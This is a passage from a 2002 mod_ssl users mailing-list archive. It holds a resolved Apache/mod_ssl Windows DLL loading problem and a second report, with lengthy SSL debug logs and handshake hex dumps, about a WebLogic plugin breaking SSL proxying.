(mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org // with regards // ID :: danalien :: PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 -----BEGIN PGP SIGNATURE----- Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies. iQA/AwUBPKtZux6FoQlEaqKIEQIjZgCfQ8lRoATPedqyVW5JsyPrGj1OfPUAnR+S qZBUaenkTVTzyjQLfgcBY3C/ =kcYs -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 00:13:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA11016; Thu, 4 Apr 2002 00:12:33 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailg.telia.com id AAA10944; Thu, 4 Apr 2002 00:10:47 +0200 (MET DST) Received: from d1o900.telia.com (d1o900.telia.com [213.66.140.241]) by mailg.telia.com (8.11.6/8.11.6) with ESMTP id g33LeR003681 for ; Wed, 3 Apr 2002 23:40:27 +0200 (CEST) Received: from DANALIEN (h43n3fls22o900.telia.com [213.65.205.43]) by d1o900.telia.com (8.10.2/8.10.1) with SMTP id g33LeNd13332 for ; Wed, 3 Apr 2002 23:40:23 +0200 (CEST) Message-Id: <200204032140.g33LeNd13332@d1o900.telia.com> From: "Danalien" To: "modssl-users@modssl.org" Date: Wed, 03 Apr 2002 23:40:22 +0200 X-Mailer: PMMail 2000 Professional (2.20.2360) For Windows 2000 (5.0.2195;2) In-Reply-To: <004301c1db3e$3c531e20$176e02c1@kekec> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Subject: Re: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Danalien" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 BINGO! :), that was it! There you have the solution : ) Some, put this in INSTALL.Win32 or in an error FAQ: "Check and delete any other/older ssleay32.dll & libleay32.dll that exist in: 1] winnt\system32 2] or any other path that exist in your %path%-varable. Simply remove the path from %path%-variable, or remove it from there. Because other/older complied dll's in tandem with newer may cause an 182 (minor) error, while starting up apache." maybe it is cygwin that puts it there ( in winnt\system32) or I did? a llonng looong time ago and forgot about it : ) *hehe* thanks, kristjan! >in Apache conf file you shoul add both, first >LoadModule ssl_module modules/mod_ssl.so >and an somewhere after that >AddModule mod_ssl.c > >but I think this error also reports when someone forget to copy the files >ssleay32.dll and libeay32.dll to WINNT\System32 > >did you do it? > >----- Original Message ----- >From: "Danalien" >To: >Sent: Wednesday, April 03, 2002 4:51 PM >Subject: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) > > >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> Hi, >> >> I need some help, i patch, complie, and everything according to: >> http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32 >> >> all goes fine fine, only get a few warnings (during the apache complie) >> >> I then go to the httpd.conf (%my_apache_ssl_root%/conf) >> >> and put this in: >> >> LoadModule ssl_module modules/mod_ssl.so >> >> >> and I get (this) when i do apache -t : >> >> C:\Program Files\Apache_SSL>apache -t >> Syntax error on line 62 of c:/program files/apache_ssl/conf/httpd.conf: >> Cannot load c:/program files/apache_ssl/modules/mod_ssl.so into server: >(182) >> Note the errors or messages above, and press the key to exit. 26... >> C:\Program Files\Apache_SSL> >> >> *thinking* *thinking*... >> >> ... then I just do a little test. >> >> remove the previos loadModule by puting a # infront (lite this): >> >> #LoadModule ssl_module modules/mod_ssl.so >> >> >> and add: >> >> AddModule mod_ssl.c >> >> >> and get : >> >> C:\Program Files\Apache_SSL>apache -t >> Syntax error on line 110 of c:/program files/apache_ssl/conf/httpd.conf: >> Cannot add module via name 'mod_ssl.c': not in list of loaded modules >> Note the errors or messages above, and press the key to exit. 23... >> C:\Program Files\Apache_SSL> >> >> >> and do a apache -l >> where I get this: >> >> Compiled-in modules: >> http_core.c >> mod_so.c >> mod_mime.c >> mod_access.c >> mod_auth.c >> mod_negotiation.c >> mod_include.c >> mod_autoindex.c >> mod_dir.c >> mod_cgi.c >> mod_userdir.c >> mod_alias.c >> mod_env.c >> mod_log_config.c >> mod_asis.c >> mod_imap.c >> mod_actions.c >> mod_setenvif.c >> mod_isapi.c >> >> >> and my suspicions were correct, "where are/is the SSL - module(s)?" cause >it ain't in >> the compiled apache :) >> >> If some could explain/help me how to meld this SSL module into apache, it >would be great :) >> thanks. >> >> >> >> >> >> >> // with regards >> // ID :: danalien :: >> >> PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 >> >> -----BEGIN PGP SIGNATURE----- >> Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and >its affiliated companies. >> >> iQA/AwUBPKsI9x6FoQlEaqKIEQKKOQCfQTAK3SV7vSoe8aE8YQqv7cjVqrQAoOe7 >> DmQQDW2F53itoAyTwCj7zlEj >> =hTM+ >> -----END PGP SIGNATURE----- >> >> >> ______________________________________________________________________ >> Apache Interface to OpenSSL (mod_ssl) www.modssl.org >> User Support Mailing List modssl-users@modssl.org >> Automated List Manager majordomo@modssl.org >> >> > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org // with regards // ID :: danalien :: PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 -----BEGIN PGP SIGNATURE----- Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies. iQA/AwUBPKtotx6FoQlEaqKIEQIX3wCgyU0jTRFr7QDy33yCfqNi6MN+SDsAoIFh fHG20gxts/XK/YItoLuC0Q8I =1hCU -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 01:41:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA16848; Thu, 4 Apr 2002 01:40:22 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from smtpgw.questia.com id BAA16811; Thu, 4 Apr 2002 01:39:07 +0200 (MET DST) Received: from shocker ([216.23.204.10]) by smtpgw.questia.com (Lotus Domino Release 5.0.7) with SMTP id 2002040317384758:281412 ; Wed, 3 Apr 2002 17:38:47 -0600 From: "Sean Staats" To: Subject: WebLogic 5.1 sp11 mod_wl_ssl.so for Apache 1.3.12/mod_ssl 2.6.6 breaks SSL Date: Wed, 3 Apr 2002 17:38:39 -0600 Message-ID: MIME-Version: 1.0 X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 X-MIMETrack: Itemize by SMTP Server on SMTPGW/Questia(Release 5.0.7 |March 21, 2001) at 04/03/2002 05:38:47 PM, Serialize by Router on SMTPGW/Questia(Release 5.0.7 |March 21, 2001) at 04/03/2002 05:38:52 PM, Serialize complete at 04/03/2002 05:38:52 PM Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Sean Staats" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users We've just upgraded from service pack 8 to service pack 11 on our WL servers and installed the sp11 mod_wl_ssl.so on our Apache servers. Unfortunately, any attempts to access an SSL page that must get proxied to the Weblogic layer results in a HTTP 404 response while an SSL request for a static HTML page works fine. The interesting thing is the sp8 mod_wl_ssl.so works just fine - so that is what we are using. However, I want to resolve the issue with the sp11 mod_wl_ssl.so. Here is our configuration: All servers: SPARC/Solaris 8 with latest patch updates Apache servers: Apache 1.3.12 with mod_ssl 2.6.6 WebLogic servers: WL 5.1 service pack 11 [03/Apr/2002 16:58:42 04816] [info] Server: Apache/1.3.12, Interface: mod_ssl/2.6.6, Library: OpenSSL/0.9.6c [03/Apr/2002 16:58:42 04816] [info] Init: 1st startup round (still not detached) [03/Apr/2002 16:58:42 04816] [info] Init: Initializing OpenSSL library [03/Apr/2002 16:58:42 04816] [info] Init: Loading certificate & private key of SSL-aware server www.questia.com:443 [03/Apr/2002 16:58:42 04816] [info] Init: Requesting pass phrase from dialog filter program (/u01/app/apache/bin/SSLpassword) [03/Apr/2002 16:58:42 04816] [trace] Init: (www.questia.com:443) encrypted RSA private key - pass phrase requested [03/Apr/2002 16:58:42 04816] [info] Init: Wiped out the queried pass phrases from memory [03/Apr/2002 16:58:42 04816] [info] Init: Seeding PRNG with 136 bytes of entropy [03/Apr/2002 16:58:42 04816] [info] Init: Generating temporary RSA private keys (512/1024 bits) [03/Apr/2002 16:58:44 04816] [info] Init: Configuring temporary DH parameters (512/1024 bits) [03/Apr/2002 16:58:51 04827] [info] Init: 2nd startup round (already detached) [03/Apr/2002 16:58:51 04827] [info] Init: Reinitializing OpenSSL library [03/Apr/2002 16:58:51 04827] [trace] Inter-Process Session Cache (DBM) Expiry: old: 0, new: 0, removed: 0 [03/Apr/2002 16:58:51 04827] [info] Init: Seeding PRNG with 136 bytes of entropy [03/Apr/2002 16:58:51 04827] [info] Init: Configuring temporary RSA private keys (512/1024 bits) [03/Apr/2002 16:58:51 04827] [info] Init: Configuring temporary DH parameters (512/1024 bits) [03/Apr/2002 16:58:51 04827] [info] Init: Initializing (virtual) servers for SSL [03/Apr/2002 16:58:51 04827] [info] Init: Configuring server www.questia.com:443 for SSL protocol [03/Apr/2002 16:58:51 04827] [trace] Init: (www.questia.com:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [03/Apr/2002 16:58:51 04827] [trace] Init: (www.questia.com:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] [03/Apr/2002 16:58:51 04827] [trace] Init: (www.questia.com:443) Configuring RSA server certificate [03/Apr/2002 16:58:51 04827] [trace] Init: (www.questia.com:443) Configuring RSA server private key [03/Apr/2002 16:59:08 04849] [info] Connection to child 13 established (server www.questia.com:443, client 10.1.0.55) [03/Apr/2002 16:59:08 04849] [info] Seeding PRNG with 1160 bytes of entropy [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Handshake: start [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: before/accept initialization [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: read 11/11 bytes from BIO#0008ADA8 [mem: 000C89D8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 80 4c 01 03 00 00 33 00-00 00 10 .L....3.... | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: read 67/67 bytes from BIO#0008ADA8 [mem: 000C89E3] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 00 00 04 00 00 05 00 00-0a 01 00 80 07 00 c0 03 ................ | | 0010: 00 80 00 00 09 06 00 40-00 00 64 00 00 62 00 00 .......@..d..b.. | | 0020: 03 00 00 06 02 00 80 04-00 80 00 00 13 00 00 12 ................ | | 0030: 00 00 63 9d 06 0a c0 65-3b 74 73 a4 06 ef ef 08 ..c....e;ts..... | | 0040: eb d7 fa ... | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 read client hello A [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 write server hello A [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 write certificate A [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 write server done A [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: write 835/835 bytes to BIO#0008ADA8 [mem: 000D6A00] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 16 03 00 00 4a 02 00 00-46 03 00 3c ab 89 3c e6 ....J...F..<..<. | | 0010: ee 49 7c 19 b0 2e 79 a0-b7 55 1c f8 8e 74 34 0d .I|...y..U...t4. | | 0020: cb 23 1e d1 6d 38 9f 0b-fa 50 a8 20 33 41 0e ab .#..m8...P. 3A.. | | 0030: 9b c0 3f 1d 7c 9d 5e 7f-c4 ba 1f 4e 05 61 34 13 ..?.|.^....N.a4. | | 0040: e6 8c 10 c9 89 c4 01 d7-d6 db 0c ad 00 04 00 16 ................ | | 0050: 03 00 02 e6 0b 00 02 e2-00 02 df 00 02 dc 30 82 ..............0. | | 0060: 02 d8 30 82 02 41 a0 03-02 01 02 02 03 08 bc ea ..0..A.......... | | 0070: 30 0d 06 09 2a 86 48 86-f7 0d 01 01 04 05 00 30 0...*.H........0 | | 0080: 81 c4 31 0b 30 09 06 03-55 04 06 13 02 5a 41 31 ..1.0...U....ZA1 | | 0090: 15 30 13 06 03 55 04 08-13 0c 57 65 73 74 65 72 .0...U....Wester | | 00a0: 6e 20 43 61 70 65 31 12-30 10 06 03 55 04 07 13 n Cape1.0...U... | | 00b0: 09 43 61 70 65 20 54 6f-77 6e 31 1d 30 1b 06 03 .Cape Town1.0... | | 00c0: 55 04 0a 13 14 54 68 61-77 74 65 20 43 6f 6e 73 U....Thawte Cons | | 00d0: 75 6c 74 69 6e 67 20 63-63 31 28 30 26 06 03 55 ulting cc1(0&..U | | 00e0: 04 0b 13 1f 43 65 72 74-69 66 69 63 61 74 69 6f ....Certificatio | | 00f0: 6e 20 53 65 72 76 69 63-65 73 20 44 69 76 69 73 n Services Divis | | 0100: 69 6f 6e 31 19 30 17 06-03 55 04 03 13 10 54 68 ion1.0...U....Th | | 0110: 61 77 74 65 20 53 65 72-76 65 72 20 43 41 31 26 awte Server CA1& | | 0120: 30 24 06 09 2a 86 48 86-f7 0d 01 09 01 16 17 73 0$..*.H........s | | 0130: 65 72 76 65 72 2d 63 65-72 74 73 40 74 68 61 77 erver-certs@thaw | | 0140: 74 65 2e 63 6f 6d 30 1e-17 0d 30 32 30 33 32 31 te.com0...020321 | | 0150: 32 31 33 37 35 32 5a 17-0d 30 33 30 33 32 31 32 213752Z..0303212 | | 0160: 31 33 37 35 32 5a 30 76-31 0b 30 09 06 03 55 04 13752Z0v1.0...U. | | 0170: 06 13 02 55 53 31 0e 30-0c 06 03 55 04 08 13 05 ...US1.0...U.... | | 0180: 54 65 78 61 73 31 10 30-0e 06 03 55 04 07 13 07 Texas1.0...U.... | | 0190: 48 6f 75 73 74 6f 6e 31-1c 30 1a 06 03 55 04 0a Houston1.0...U.. | | 01a0: 13 13 51 75 65 73 74 69-61 20 4d 65 64 69 61 2c ..Questia Media, | | 01b0: 20 49 6e 63 2e 31 0d 30-0b 06 03 55 04 0b 13 04 Inc.1.0...U.... | | 01c0: 49 2e 4d 2e 31 18 30 16-06 03 55 04 03 13 0f 77 I.M.1.0...U....w | | 01d0: 77 77 2e 71 75 65 73 74-69 61 2e 63 6f 6d 30 81 ww.questia.com0. | | 01e0: 9f 30 0d 06 09 2a 86 48-86 f7 0d 01 01 01 05 00 .0...*.H........ | | 01f0: 03 81 8d 00 30 81 89 02-81 81 00 c8 02 14 a3 15 ....0........... | | 0200: 6a 35 54 0f 60 03 ae a0-9f a1 dc aa c7 cd 9b f7 j5T.`........... | | 0210: 5a ac 38 b0 42 e1 82 f6-f7 ce 9f 23 cb be e9 4a Z.8.B......#...J | | 0220: 07 b9 57 71 6d c0 1a 85-1e d7 19 3d d9 43 37 7d ..Wqm......=.C7} | | 0230: b2 2f 05 ce 8a b2 4d bc-da 46 24 f7 f7 bd ec c5 ./....M..F$..... | | 0240: 19 7c 18 ae 44 55 fb 56-50 58 7a d6 12 a2 17 23 .|..DU.VPXz....# | | 0250: c7 e2 36 19 b4 60 63 d8-3d 1e 1c 3b 8c b4 56 0e ..6..`c.=..;..V. | | 0260: e6 d5 a6 aa 39 0c fe ad-54 64 1a ea a9 43 25 65 ....9...Td...C%e | | 0270: 8b 9c e0 0d e0 2c 59 3b-41 2b 7b 02 03 01 00 01 .....,Y;A+{..... | | 0280: a3 25 30 23 30 13 06 03-55 1d 25 04 0c 30 0a 06 .%0#0...U.%..0.. | | 0290: 08 2b 06 01 05 05 07 03-01 30 0c 06 03 55 1d 13 .+.......0...U.. | | 02a0: 01 01 ff 04 02 30 00 30-0d 06 09 2a 86 48 86 f7 .....0.0...*.H.. | | 02b0: 0d 01 01 04 05 00 03 81-81 00 1c de 8a a0 2d da ..............-. | | 02c0: fb 80 a7 46 0a 1f 39 52-55 1b 88 ab b4 ba 08 d3 ...F..9RU....... | | 02d0: 9f 6f da 46 cf 8b 28 9e-a6 e3 69 aa 16 c2 34 32 .o.F..(...i...42 | | 02e0: cd a1 22 73 3a 32 d3 99-7a 1c f3 80 4c 04 91 5e .."s:2..z...L..^ | | 02f0: b6 d5 60 83 48 2b 73 8d-f7 dc 97 b1 18 b2 92 9a ..`.H+s......... | | 0300: a2 bf 7e 7a ba ac 95 8b-1e bf 81 a5 aa a0 14 41 ..~z...........A | | 0310: c8 3c 75 06 e7 7f a6 50-9b 3a 02 43 6c 5c c2 e5 . +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 flush data [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: read 5/5 bytes from BIO#0008ADA8 [mem: 000C89D8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 16 03 00 00 84 ..... | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: read 132/132 bytes from BIO#0008ADA8 [mem: 000C89DD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 10 00 00 80 3d ee 5c e3-6d ce ec 75 c0 82 c9 9c ....=.\.m..u.... | | 0010: 2f 93 10 91 f8 14 a0 cb-39 1b 3e 09 7b 84 b1 a0 /.......9.>.{... | | 0020: e4 56 33 5f 94 3b 87 ff-5d 46 c1 4a a9 8c bf 98 .V3_.;..]F.J.... | | 0030: e9 12 78 a8 87 b5 63 b9-40 1d 3f 95 c7 57 16 0a ..x...c.@.?..W.. | | 0040: 45 eb b4 31 be de 56 c0-60 fe 54 3c 20 bf eb a1 E..1..V.`.T< ... | | 0050: 15 b6 93 df 7f 70 0c f5-16 aa cb d9 78 8e 29 fd .....p......x.). | | 0060: fd fa 97 87 12 98 86 08-00 a1 e7 4b d7 38 c3 88 ...........K.8.. | | 0070: 5a df 81 03 42 63 a5 09-f5 b5 0e aa 2b 53 f5 10 Z...Bc......+S.. | | 0080: c1 01 76 3e ..v> | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: read 5/5 bytes from BIO#0008ADA8 [mem: 000C89D8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 14 03 00 00 01 ..... | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: read 1/1 bytes from BIO#0008ADA8 [mem: 000C89DD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 01 . | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: read 5/5 bytes from BIO#0008ADA8 [mem: 000C89D8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 16 03 00 00 38 ....8 | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: read 56/56 bytes from BIO#0008ADA8 [mem: 000C89DD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: ee 7f 57 10 31 c7 ee 23-67 68 cb ff 40 f9 94 74 ..W.1..#gh..@..t | | 0010: 8c 42 a3 d2 a0 3e 0e 2e-82 04 2b 85 12 21 af ce .B...>....+..!.. | | 0020: 8a e1 ae 97 b6 fa 35 0a-e8 08 25 3a cd 91 6f 21 ......5...%:..o! | | 0030: 1a 8d 4b ed 63 e5 08 81- ..K.c... | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 read finished A [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 write finished A [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: write 67/67 bytes to BIO#0008ADA8 [mem: 000D6A00] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 14 03 00 00 01 01 16 03-00 00 38 4d 27 82 05 47 ..........8M'..G | | 0010: 12 4e c6 d4 6c 2e 77 70-9e d5 62 1f 81 24 c8 cc .N..l.wp..b..$.. | | 0020: 2d 2d ce 3d 4f 34 d4 fd-46 3c b9 cc 6b 6b af 81 --.=O4..F<..kk.. | | 0030: a1 78 f2 6c 9c ee 2e 75-97 30 3f 42 18 26 5f d0 .x.l...u.0?B.&_. | | 0040: 04 b5 4c ..L | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Loop: SSLv3 flush data [03/Apr/2002 16:59:08 04849] [trace] Inter-Process Session Cache: request=SET status=OK id=33410EAB9BC03F1D7C9D5E7FC4BA1F4E05613413E68C10C989C401D7D6DB0CAD timeout=300s (session ca ching) [03/Apr/2002 16:59:08 04849] [trace] OpenSSL: Handshake: done [03/Apr/2002 16:59:08 04849] [info] Connection: Client IP: 10.1.0.55, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: read 611/18437 bytes from BIO#0008ADA8 [mem: 000C89D8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 02 5e c2 bf 0e-1a c1 d8 b8 71 01 0a 81 ....^.......q... | | 0010: 55 33 4b 7f 10 42 9f e1-1b a6 1a b0 00 88 49 89 U3K..B........I. | | 0020: 3f 7d 0c 86 c6 8e a1 9d-27 ab 02 c1 74 89 c0 d1 ?}......'...t... | | 0030: 1f 12 4a bb c1 c0 d2 d8-f9 e4 32 be d1 c9 0f 18 ..J.......2..... | | 0040: 74 a4 03 e9 e1 59 02 9d-a4 cb 67 00 f9 a4 2a d6 t....Y....g...*. | | 0050: 48 56 53 d6 d7 43 42 4d-41 81 74 09 d6 96 7c dc HVS..CBMA.t...|. | | 0060: a8 21 80 3d 61 8f f4 51-4e e7 a9 78 bb 62 4d 33 .!.=a..QN..x.bM3 | | 0070: 0e 24 84 d6 6c 8a b5 03-5d 7e f3 d2 95 8f a4 2d .$..l...]~.....- | | 0080: 03 5c 6d e7 b4 91 bc 66-60 bb 32 2f d1 0b a7 44 .\m....f`.2/...D | | 0090: 38 43 92 d2 59 e8 73 26-3f 71 5f 1f 9d 9a b8 e4 8C..Y.s&?q_..... | | 00a0: 20 13 a8 c5 4a fd d3 0c-45 0c 2d 9d 81 1c 49 71 ...J...E.-...Iq | | 00b0: 07 55 26 7f 75 41 fb 75-42 10 a6 f0 17 22 39 6f .U&.uA.uB...."9o | | 00c0: bc 8d 07 60 86 99 85 ce-af c8 da 08 ac 81 7f e0 ...`............ | | 00d0: bb 61 a5 06 89 d0 d0 1e-54 0a 92 62 ac bf 1e 57 .a......T..b...W | | 00e0: 45 54 d4 fc 6e bc 58 9c-17 d8 19 91 32 a7 7b bb ET..n.X.....2.{. | | 00f0: 90 59 1e 19 16 63 87 a8-6b 79 5a 23 55 2f c5 8b .Y...c..kyZ#U/.. | | 0100: cd fe f7 cd 6a 84 b0 cb-93 51 54 9b 12 66 66 fa ....j....QT..ff. | | 0110: 7e cb 6f 65 f8 76 68 2b-26 22 be 29 3a 71 74 c3 ~.oe.vh+&".):qt. | | 0120: 8d b1 64 e9 09 97 a5 02-d8 e7 27 76 36 1a 4b 8b ..d.......'v6.K. | | 0130: 41 85 2a 09 95 1a f7 b3-c6 24 31 58 e3 b6 98 1a A.*......$1X.... | | 0140: 98 74 0e a3 8d a3 5d da-7a 24 0a 8d 78 3e 24 81 .t....].z$..x>$. | | 0150: a1 57 bc 3f a1 cc 09 5a-b5 23 1d 35 13 bd 81 4f .W.?...Z.#.5...O | | 0160: f3 48 61 c0 8e 3a 47 30-6f 50 1a 11 46 9a 4b 90 .Ha..:G0oP..F.K. | | 0170: b6 c1 3d 96 1d 20 68 53-2e 25 aa 02 9a 25 cf b6 ..=.. hS.%...%.. | | 0180: 3a 35 3c a1 cd 7d 3b 9d-0d 4b 8b f1 e6 ea 57 75 :5<..};..K....Wu | | 0190: 97 58 2c 6f ae f6 69 17-f1 e5 96 c1 c5 2e a5 90 .X,o..i......... | | 01a0: d3 3b 14 7d 2a c0 b0 c6-fd c3 5b 58 ec b1 01 14 .;.}*.....[X.... | | 01b0: ff 3c 60 8a 2b 90 53 9a-7d ff e0 63 5a b1 a8 7b .<`.+.S.}..cZ..{ | | 01c0: c1 c2 fd 3b 5a ca 5c ef-70 b3 8f bb 35 cd a6 ca ...;Z.\.p...5... | | 01d0: 78 97 5a 70 b5 7a aa 8a-34 03 a0 a8 e9 22 d9 c4 x.Zp.z..4....".. | | 01e0: 9a 0f 8d 20 4f 42 b2 c5-9d 7c 02 aa a3 d5 ed 5c ... OB...|.....\ | | 01f0: fb c7 c9 c4 d0 6b 43 0a-45 9c d5 24 f3 20 a7 26 .....kC.E..$. .& | | 0200: 2b 72 ce f6 04 69 4a f9-98 81 3e 37 de 78 15 14 +r...iJ...>7.x.. | | 0210: df d7 eb a1 7c 64 19 b3-e0 6f 8a de 37 6b 9a 7c ....|d...o..7k.| | | 0220: 62 d3 a5 1a 6d 3c 21 2c-1a af 26 39 d3 0b c9 e8 b...m{.UN.b/Y..b | | 0250: 1d 99 ad 6e 08 aa f3 67-fd e3 2a 21 88 aa 53 67 ...n...g..*!..Sg | | 0260: 3d dc 2f =./ | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [info] Initial (No.1) HTTPS request received for child 13 (server www.questia.com:443) [03/Apr/2002 16:59:08 04849] [debug] OpenSSL: write 418/418 bytes to BIO#0008ADA8 [mem: 000D11E8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 01 9d 89 42 b7-f8 fb 30 99 33 59 b1 a9 ......B...0.3Y.. | | 0010: fc 3f 71 96 16 fd ef 34-49 de 3f 57 06 c1 f1 11 .?q....4I.?W.... | | 0020: d5 b2 85 31 85 da 07 d9-08 d5 42 93 1e 37 fa 03 ...1......B..7.. | | 0030: bb 47 b2 f0 b5 a7 37 08-5e e3 c0 fe e2 9a 33 08 .G....7.^.....3. | | 0040: 2e 4e 2b 28 6e fc 60 20-4f 4b 21 39 67 6c 29 a7 .N+(n.` OK!9gl). | | 0050: 76 68 40 7c d9 ec 4d 40-b8 10 46 23 4f 4e a7 e8 vh@|..M@..F#ON.. | | 0060: 56 f1 75 d3 c5 32 43 c3-b4 00 bd f3 10 13 d2 55 V.u..2C........U | | 0070: 98 03 fc cb e8 60 f1 88-30 42 42 6e 33 ac d9 69 .....`..0BBn3..i | | 0080: 99 06 75 e2 e6 b0 f5 64-bb 7c 26 7c 37 20 b6 64 ..u....d.|&|7 .d | | 0090: da c5 5b 40 d1 f0 8a 06-84 71 02 a2 e3 67 45 ac ..[@.....q...gE. | | 00a0: 6b 9f 0f c8 57 d7 9f 7b-44 b7 05 89 81 22 a1 f0 k...W..{D....".. | | 00b0: 79 e7 27 27 e2 43 f8 1c-57 93 c1 8b 3b 25 17 41 y.''.C..W...;%.A | | 00c0: 8a 99 1f d7 34 44 17 73-61 58 be 43 b1 da c6 03 ....4D.saX.C.... | | 00d0: e6 f0 b8 59 b6 d4 da 23-33 85 89 2a fa 9d 5b 96 ...Y...#3..*..[. | | 00e0: 9b 3d cd 70 41 4b a1 c4-25 de 52 5f 57 e7 b9 c4 .=.pAK..%.R_W... | | 00f0: 1d 8c 55 36 b0 40 9a 6c-c7 26 49 ee 7b 28 bd 49 ..U6.@.l.&I.{(.I | | 0100: c2 b0 59 3d c4 e3 27 83-8a 02 15 ed 82 eb 2e 90 ..Y=..'......... | | 0110: 00 ad df 37 ae a7 9e 92-44 56 3f c7 13 ea 7f ef ...7....DV?..... | | 0120: e0 25 e1 23 ca 0a 1b 37-52 44 c0 6b 8d 1b ae 61 .%.#...7RD.k...a | | 0130: 78 82 ac dd 2c 88 47 49-e8 20 db a6 51 5d 36 9d x...,.GI. ..Q]6. | | 0140: b9 31 d8 2b fe f1 22 1c-79 0a af 28 6d c2 6b 2a .1.+..".y..(m.k* | | 0150: da 91 08 d4 9c 58 3f 5c-4a 51 c1 66 03 27 6d 48 .....X?\JQ.f.'mH | | 0160: 55 1d 9c 77 2c 2e c1 4a-51 4b a0 4a d7 37 2f 94 U..w,..JQK.J.7/. | | 0170: de ab bb fe 6c 5e fd d5-ee a1 d3 d4 f9 58 a6 c3 ....l^.......X.. | | 0180: 89 4d 54 f4 96 f0 5b fa-61 8d 49 cf 62 c1 17 3c .MT...[.a.I.b..< | | 0190: 4a 50 e9 ea a3 9b bd 7d-d1 a1 df ec 82 58 46 78 JP.....}.....XFx | | 01a0: 03 60 .` | +-------------------------------------------------------------------------+ [03/Apr/2002 16:59:08 04849] [info] Connection to child 13 closed with unclean shutdown (server www.questia.com:443, client 10.1.0.55) I realize this may be a BEA/WebLogic issue, but I hope somebody else (other than BEA) has some 